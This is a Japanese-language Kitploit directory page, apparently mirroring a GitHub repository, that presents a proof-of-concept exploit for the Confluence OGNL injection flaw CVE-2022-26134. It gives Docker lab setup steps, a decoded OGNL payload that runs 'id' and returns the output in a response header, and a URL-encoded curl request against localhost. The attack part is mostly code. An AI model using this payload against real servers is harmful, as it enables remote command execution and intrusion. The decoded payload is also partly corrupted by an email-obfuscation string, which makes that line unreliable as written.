Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26134 — Atlassian Confluence OGNL インジェクションによるリモートコード実行 (RCE) の脆弱性 (CVE-2022-26134) | Kitploit
ツール/GitHubGitHub/coldfusionx/cve-2022-26134
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubcoldfusionx/cve-2022-26134

CVE-2022-26134

Atlassian Confluence OGNL インジェクションによるリモートコード実行 (RCE) の脆弱性 (CVE-2022-26134)

リポジトリを見る
224年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

POC - Atlassian Confluence OGNLインジェクションによるリモートコード実行(RCE)脆弱性(CVE-2022-26134)

Confluence バージョン 7.13.6 でテスト済み

環境のセットアップ

  • リポジトリをクローンします
root@kitploit:~
docker-compose up -d 
  • http://localhost:8090 にアクセスすると、Confluence が起動して実行されているのが確認できます。

  • 次に、Confluence の評価ライセンスを取得し、データベース名 confluence、ユーザー名 postgres、パスワード root でデータベースをセットアップします。

エクスプロイト

  • デコード済みペイロード
root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
  • Curl リクエスト
root@kitploit:~
curl -v "http://localhost:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%
  • POC poc
ツールをダウンロード